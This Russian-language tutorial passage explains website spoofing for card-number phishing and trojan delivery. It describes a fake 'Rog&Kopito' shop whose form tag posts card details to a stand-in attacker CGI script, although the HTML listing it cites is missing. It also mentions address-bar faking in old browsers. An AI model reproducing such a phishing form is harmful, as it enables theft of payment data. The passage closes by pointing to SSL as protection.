Подмена Web-caйтoв

Все описанные выше атаки могут сильно испортить нервы беспечного Web-путешественника, но, как правило, дело только этим и ограничивается - реальный вред с помощью загруженных с Web-страницей враждебных аплетов и сценариев нанести достаточно сложно. Подобные атаки практически не опасны, если защита Web-браузера настроена на блокирование не сертифицированных элементе ActiveX, и не выполняет в автоматическом режиме загруженные сценарии.

Однако имеется другая разновидность хакинга, основанная исключительно на мошенничестве, и ориентированная на извлечение финансовых средств у всех тех личностей, которые, стремясь идти в ногу со временем, обзаводятся кредитными карточками, счетами в Интернет-банках, используя их для покупок в Интернет-магазинах и т.д. При этом мало кто из счастливых обладателей Интернет-карточек представляет, как работает механизм, обслуживающий их покупки. Многие вообще не интересуются, как будут использоваться владельцами виртуального магазина переданные им совершенно конфиденциальные данные - номер и другие платежные реквизиты кредитной карточки.

Все это - сущий клад для хакера, поскольку все что нужно сделать для обмана покупателей - это создать Web-сайт, копирующий внешний вид электронного магазина известной фирмы. Далее, распространив ссылки на этот сайт по всему Интернету, хакер может без проблем продавать виртуальный воздух и снимать деньги со счетов доверчивых посетителей.

Другая возможность, которую открывает для хакеров фальсификация Web-страниц - предоставление возможностей для загрузки злонамеренных програми. Например, вместо загрузки нового пакета обновления системы Windows с Web-сайта Microsoft вы можете загрузить и запустить троянского коня наподобие уже упоминавшейся программы NetBus.

Сейчас мы опишем технику фальсификации Web-сайта, имитирующего виртуальный «Шоп» по продаже «виртуального воздуха» всем богатеньким и тупым «ламерам». Эта техника достаточно проста и заключается в помещении Web-странице злоумышленника ссылки на сценарий, генерирующий прямо на компьютере пользователя фальсифицированный ресурс. В Листинге 7. приведен пример кода HTML, реализующего фальсифицированный Интернет магазин.

Листинг 7. Пример фальсификации документа HTML

При загрузке кода из листинга 7 браузер IE 5 отобразит страницу, представленную на Рис. 6.

Рис. 6. Web-страница компании Rog&Kopito

обратите внимание на отображаемый в строке состояния адрес ссылки - http://www.Bubliki&Baranki.com и на текст заголовка окна браузера - Фирма Rog&Kopito предлагает. Посетитель Web-сайта компании Rog&Kopito может заинтересоваться новым программным продуктом известной компании Bubliki&Baranki, но покупка программы с Web-сайта компании Rog&Kopito может вызвать у него смутные подозрения. (Надеюсь, вы понимаете, что названия компаний здесь и в последующих уроках не имеют отношение к реальным Фирмам и придуманы только для иллюстрации.) Поэтому посетителю предоставляется ссылка, якобы приглашающая его перейти на Web-сайт компании Bubliki&Baranki. После щелчка мышью на ссылке встроенный в страничку сценарий отображает фальсифицированную Web-страничку, представленную на Рис. 7.

Рис. 7. Web-страничка заказа продукта VirtualAir от компании Bubliki&Baranki

Фальсифицированная Web-страничка на Рис. 8.6 предлагает посетителю ввести свои идентификационные данные вместе с номером кредитной карточки для оплаты покупки по Интернету. Щелчок на кнопке Отправить отсылает эти очень вкусные данные CGI-сценарию GetCardNumber, как это видно из тега формы сценарии Web-странички, помещенной на сервере компании Rog&Kopito:

<FORM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'METHOD=post>

Если пользователь не обратит внимания на мелкую деталь - строку Адрес (Address) с несколько странным содержимым, он может и не заметить подмены реального магазина фальсифицированным «Шопом», в результате которой номер его кредитной карточки перекочует в базу данных злоумышленников со всеми, как говорится, вытекающими последствиями.

В старых версиях браузера IE можно было без проблем манипулировать строкой Address из сценария Javascript. Хакеры легко скрывали содержимое этой строки ложным адресом URL Для иллюстрации кода HTML здесь был использован браузер IE который весьма затрудняет подобные действия, более того, IE 6 предупреждает о наличии в коде HTML средств для манипулировании отображаемыми данными. Так что будьте начеку!

Другой, не менее интересный способ перехвата конфиденциальных данных которыми обменивается Web-браузер с сервером - это снифинг сетевых соединений. Перехватывая передаваемые по сети пакеты с номерами кредитных карточек, паролями и прочими интересными сведениями, хакеры могут достичь очень многого, о чем мы еще расскажем далее в этих уроках.

Пока же займемся следующим вопросом - как же уберечься от такой напасти. Для этого существуют средства криптографической защиты, а именно, протокол SSL (а также менее распространенный TSL) и сертификаты владельцев Web-серверов.